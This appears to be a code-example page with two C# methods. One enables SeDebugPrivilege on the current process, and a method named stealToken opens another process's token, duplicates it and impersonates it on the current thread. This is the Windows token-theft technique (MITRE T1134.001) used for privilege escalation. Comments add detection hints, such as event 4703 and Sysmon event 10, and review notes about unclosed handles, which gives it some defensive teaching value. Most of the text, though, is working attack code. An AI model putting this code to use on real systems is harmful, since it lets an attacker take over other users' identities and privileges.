コード例 #1
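        /// <summary>
        /// Opens the current process token with TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY and
        /// asks the system to enable SeDebugPrivilege on it, reporting each step on the console.
        /// </summary>
        /// <remarks>
        /// SeDebugPrivilege lets a process open other processes regardless of their
        /// security descriptor, so it should be held only by accounts that need it
        /// (the "Debug programs" user right). Enabling it on a token is recorded by
        /// Security event 4703 when "Audit Token Right Adjusted" is turned on.
        /// </remarks>
        /// <returns>
        /// <see cref="IntPtr.Zero"/> when the token could not be opened or the privilege
        /// LUID could not be looked up. Otherwise the open token handle, which is returned
        /// even when the privilege could not be enabled; the caller owns that handle and
        /// must release it with CloseHandle.
        /// </returns>
        private static IntPtr enableSEDebugPrivilege()
        {
            // ERROR_NOT_ALL_ASSIGNED (winerror.h): AdjustTokenPrivileges returned TRUE but
            // the token does not hold one or more of the requested privileges.
            const int ErrorNotAllAssigned = 1300;

            IntPtr hToken = IntPtr.Zero;

            WindowsAPIHelper.LUID             luidSEDebugNameValue;
            WindowsAPIHelper.TOKEN_PRIVILEGES tkpPrivileges;

            if (!WindowsAPIHelper.OpenProcessToken(WindowsAPIHelper.GetCurrentProcess(), (uint)WindowsAPIHelper.DesiredAccess.TOKEN_ADJUST_PRIVILEGES | (uint)WindowsAPIHelper.DesiredAccess.TOKEN_QUERY, out hToken))
            {
                Console.WriteLine("OpenProcessToken() failed, error = {0} . SeDebugPrivilege is not available", Marshal.GetLastWin32Error());
                return(IntPtr.Zero);
            }
            else
            {
                Console.WriteLine("OpenProcessToken() successfully");
            }

            if (!WindowsAPIHelper.LookupPrivilegeValue(null, WindowsAPIHelper.PrivilegeName.SE_DEBUG_NAME, out luidSEDebugNameValue))
            {
                Console.WriteLine("LookupPrivilegeValue() failed, error = {0} .SeDebugPrivilege is not available", Marshal.GetLastWin32Error());
                // The token was opened above; release it before bailing out.
                WindowsAPIHelper.CloseHandle(hToken);
                return(IntPtr.Zero);
            }
            else
            {
                Console.WriteLine("LookupPrivilegeValue() successfully");
            }

            tkpPrivileges.PrivilegeCount = 1;
            tkpPrivileges.Luid           = luidSEDebugNameValue;
            tkpPrivileges.Attributes     = WindowsAPIHelper.PrivilegeName.SE_PRIVILEGE_ENABLED;

            // Capture the last error immediately after the call so no later call can
            // overwrite it. NOTE(review): this assumes the P/Invoke declaration of
            // AdjustTokenPrivileges uses SetLastError = true; confirm in WindowsAPIHelper.
            bool adjusted    = WindowsAPIHelper.AdjustTokenPrivileges(hToken, false, ref tkpPrivileges, 0, IntPtr.Zero, IntPtr.Zero);
            int  adjustError = Marshal.GetLastWin32Error();

            if (!adjusted)
            {
                Console.WriteLine("AdjustTokenPrivileges() failed, error = {0} .SeDebugPrivilege is not available", adjustError);
            }
            else if (adjustError == ErrorNotAllAssigned)
            {
                // A TRUE return alone does not mean the privilege was enabled: when the
                // account does not hold SeDebugPrivilege the call still succeeds and
                // reports ERROR_NOT_ALL_ASSIGNED through the last-error value.
                Console.WriteLine("AdjustTokenPrivileges() returned ERROR_NOT_ALL_ASSIGNED ({0}). SeDebugPrivilege is not available", adjustError);
            }
            else
            {
                Console.WriteLine("SeDebugPrivilege is now available");
            }
            return(hToken);
        }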
コード例 #2
        /// <summary>
        /// Opens the token of the process returned by attachProcess(), duplicates it as an
        /// impersonation token, impersonates it on the current thread and prints the
        /// resulting user name and SID.
        /// </summary>
        /// <remarks>
        /// Defender note: enabling SeDebugPrivilege, opening another process's token,
        /// calling DuplicateTokenEx and then impersonating is the pattern catalogued as
        /// MITRE ATT&amp;CK T1134.001 (Token Impersonation/Theft). Security event 4703
        /// records the privilege being enabled; if attachProcess() opens a handle to
        /// another process (it is defined elsewhere, so this is presumed), Sysmon
        /// Event ID 10 (ProcessAccess) records that access. Limiting which accounts hold
        /// the "Debug programs" user right removes the precondition.
        ///
        /// NOTE(review): the SecurityImpersonate parameter is never read; the handles
        /// returned by enableSEDebugPrivilege() and attachProcess() are never closed; the
        /// return value of OpenProcessToken is not checked; and the WindowsIdentity built
        /// from the duplicate is not disposed.
        /// </remarks>
        /// <param name="token">Receives the token handle opened on the attached process.</param>
        /// <param name="SecurityImpersonate">Unused by this method.</param>
        /// <param name="duplicateToken">Receives the duplicated impersonation token handle.</param>
        static void stealToken(ref IntPtr token, int SecurityImpersonate, ref IntPtr duplicateToken)
        {
            // Print the identity we start with, for comparison with the output below.
            string startingUser = WindowsIdentity.GetCurrent().Name;
            Console.WriteLine("Current User: {0}", startingUser);

            IntPtr privilegeToken = enableSEDebugPrivilege();
            IntPtr processHandle  = attachProcess();

            uint maximumAllowed = (uint)WindowsAPIHelper.DesiredAccess.TOKEN_MAXIMUM_ALLOWED;
            WindowsAPIHelper.OpenProcessToken(processHandle, maximumAllowed, out token);

            WindowsAPIHelper.SECURITY_ATTRIBUTES securityAttributes = new WindowsAPIHelper.SECURITY_ATTRIBUTES();

            Console.WriteLine("Stealing token...");

            // Author's note: the token type needs to be Primary when launching a new
            // process and Impersonation when changing a thread's token; this call asks
            // for an impersonation token at SecurityImpersonation level.
            bool duplicated = WindowsAPIHelper.DuplicateTokenEx(
                token,
                maximumAllowed,
                ref securityAttributes,
                WindowsAPIHelper.SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,
                WindowsAPIHelper.TOKEN_TYPE.TokenImpersonation,
                out duplicateToken);

            if (!duplicated)
            {
                Console.WriteLine("Unable to duplicate token!");
                return;
            }

            if (duplicateToken == IntPtr.Zero)
            {
                Console.WriteLine("Failed");
                return;
            }

            WindowsIdentity duplicatedIdentity = new WindowsIdentity(duplicateToken);

            // Impersonation lasts only for the using block; disposing the context
            // reverts the thread to its previous identity.
            using (WindowsImpersonationContext context = duplicatedIdentity.Impersonate())
            {
                if (context == null)
                {
                    return;
                }

                string effectiveName = WindowsIdentity.GetCurrent(TokenAccessLevels.MaximumAllowed).Name;
                string effectiveSid  = WindowsIdentity.GetCurrent(TokenAccessLevels.MaximumAllowed).User.Value;
                Console.WriteLine("After Impersonation Succeeded!\nUser: {0}\nSID: {1}", effectiveName, effectiveSid);
            }
        }